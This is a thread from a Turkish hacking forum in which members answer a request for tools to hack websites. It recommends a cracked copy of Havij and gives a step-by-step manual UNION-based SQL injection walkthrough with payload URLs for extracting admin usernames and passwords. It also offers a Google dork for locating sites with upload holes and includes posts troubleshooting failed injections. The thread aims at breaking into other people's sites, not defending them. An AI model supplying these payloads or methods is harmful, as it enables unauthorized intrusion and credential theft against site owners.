site hacklerken hangi programı kullanıyorsunuz yardım

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

D0LCh

Katılımcı Üye
7 Tem 2011
509
0
Gasseri
öyle bi program olsa dünyada site kalmaz ;)
sadece bazı programlar var mesela havij sitede sql açığı bulursun havijle taratarak admin adına şifresine ulaşırsn...
mesela active perl exploitleri onunla kullanabilirsin(başka işlevi varsa bilmiyorum ben exploit açmak için kullanıyorum)

HAVİJİ İNDİR BENCE İŞİNE YARAR

BURADAN İNDİREBİLİRSİN:http://www.turkhackteam.net/hack-videolari/573593-havij-son-surum-1-15-cracked.html


BUDA FORUMDAKİ HAVİJ KULLANIMIYLA İLGİLİ EN İYİ ANLATIM:http://www.turkhackteam.net/hack-vi...hacklemek-havij-kullanim-indirmeden-izle.html
 

HAKOPS

Kıdemli Üye
11 Tem 2011
4,199
6
Izmir
Dedikleri Gibi Programla Site Hacklenmez İlk Önce Acık Bulman Lazım Sonrası Çorap Söküğü Gibi Gelir...

Ki Bence En Sağlıklı Açık Bulma Yöntemi "Elle Taramadır"
 

Bouncer

Katılımcı Üye
13 Eki 2011
477
0
Ellede Yapabilirsin Siteye Hata Verdir
Örn: Sql İnjection'da version bulmayı önceki yazılarda anlatmıştım. Şimdi version bulduktan sonra izleyeceğimiz yol versiona göre değişir. Bu yazıda 4 versionu anlatacağım. Version 4 de olay tahmin işidir. Table ve column adlarını tahmin ederek veri çekebiliriz. Biraz sabır işi ancak uğraşınca işin zevkine varacaksınız. Hemen örnekleyelim ve sayılar şöyle ekrana yansımış olsun;
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6--
(Şimdi "from" komutunu kullanarak table adını bulup veri çekeceğiz)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admin--
(admin bilgilerinin bulunduğu table'ı bulmamız gerekiyor. İlk olarak admin denedim. Site hata verdi ve sayılar ekrana yansımadı)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admins--
(yine sayılar ekrana yansımadı. Sayılar ekrana yansıyana kadar devam edeceğiz.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+user--
(Hala yansımadı.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+users--
(Evet şimdi sayılar ekrana yansıdı.Sizde sayılar ekrana yansımazsa "member,members,administrator,administrator vs." gibi türetin.Diyelim ki 3 ve 5 ekrana yansıdı. 3'ün veya 5'in yerine kolon adlarını yazarak kolon adlarını tahmin edeceğiz.) Şöyle ki;
-orneksite.com/ders.php?id=-1+union+select+1,2,username,4,5,6+from+users--
(hata verdi o zaman değiştiriyoruz)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,5,6+from+users--
(kullanıcı adı çıktı.Şimdi şifreye geçelim)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,kullanicisifre,6+from+users--
(şifre ve kullanıcı adı çıktı.)
 

Margu

Kıdemli Üye
26 Eki 2010
2,944
0

muco98

Katılımcı Üye
13 Şub 2011
278
0
Dedikleri Gibi Programla Site Hacklenmez İlk Önce Acık Bulman Lazım Sonrası Çorap Söküğü Gibi Gelir...

Ki Bence En Sağlıklı Açık Bulma Yöntemi "Elle Taramadır"

kardeşime çok katılıyorum manuel her zaman doğru sonucu verir
2. hususa geçicek olursa
upload açığı olan sitelerden başla derim
googleden bu kodu arat
"inurl:rte/my_********s/my_files/"
sonra bu kodu yapıştır
örnek
Attach File Properties
bu şekilde
kolay gelsin
 

D0LCh

Katılımcı Üye
7 Tem 2011
509
0
Gasseri
margu 3 videonuda izledim fakat exploitleki vidyonda takip ettiğim adımlarda seninle aynı sonuca varmadım
sanırım verdiğin exploit php dillerinde düzgün çalışmıyor :S
 

MajestiC TC

Yeni üye
12 Eki 2011
25
0
margu bende hack videosunu izledim sonuc 0 program güzel işe yarıyor ama siteyide buldum sonuna +order+by+1 2 3 4 5 6 7 denedim 12345 hata almadım ama 6-7 de alıdm
sonra union+select+0,1,2,3,4,5,6,7+from+user yazdım union+select+0,1,2,3,4,username,password,7+from+user yazdım yine olmadı değişik olabilir yazmısın sadece sitede 2 tane tablo vardı user 2 admin 2 sinidedenedm olmadı nyse yine sağol :)
 

PcChoLik

Uzman üye
18 Tem 2011
1,587
0
İstanbul
SqL Inject. için Havij\Klavyem
Açık Tarama için AcunetiX
XSS için Klavyem ile :D
RFI LFI için Klavyem ile :D

Klavyem bazı arkadaşlar için yanlış anlaşılmasın program değildir :D
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.